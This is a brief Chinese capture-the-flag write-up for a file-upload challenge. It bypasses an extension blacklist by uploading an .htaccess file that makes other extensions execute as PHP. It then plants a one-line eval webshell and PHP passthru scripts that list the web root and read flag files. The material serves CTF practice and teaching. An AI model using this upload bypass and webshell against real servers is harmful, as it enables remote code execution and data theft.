htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
康康源代码,有黑名单限制
方法一
上传.htacess文件,内容为
<FilesMatch "is">
setHandler application/x-httpd-php
</FilesMatch>
上传一句话木马c.is
<?php eval($_POST['c']);?>
每次做完都喜欢去康康其他人怎么做的
方法二
https://www.cnblogs.com/anweilx/p/12523582.html
我上面的那种方式时文件名的正则匹配,这位大佬还给出了另一种后缀匹配
AddType application/x-httpd-php .jpg
方法三
https://blog.csdn.net/weixin_42742658/article/details/106132770
这个是不利用webshell工具来获得(要上传两次文件,利用命令执行)
<?php
#passthru("ls /var/www/html/"); //第一次只写这一行,用来找flag文件在哪里
passthru("cat /var/www/html/flag_229326633.php");//第二次是找到了flag文件之后,直接读取内容
?>
方法三改进
然后为了不这么麻烦我就改进了一下
上传a.php
<?php
passthru("ls /var/www/html/");//查看目录下有什么文件
passthru("cd /var/www/html/;cat flag*");//查看以flag开头的文件的内容
?>
右键查看源代码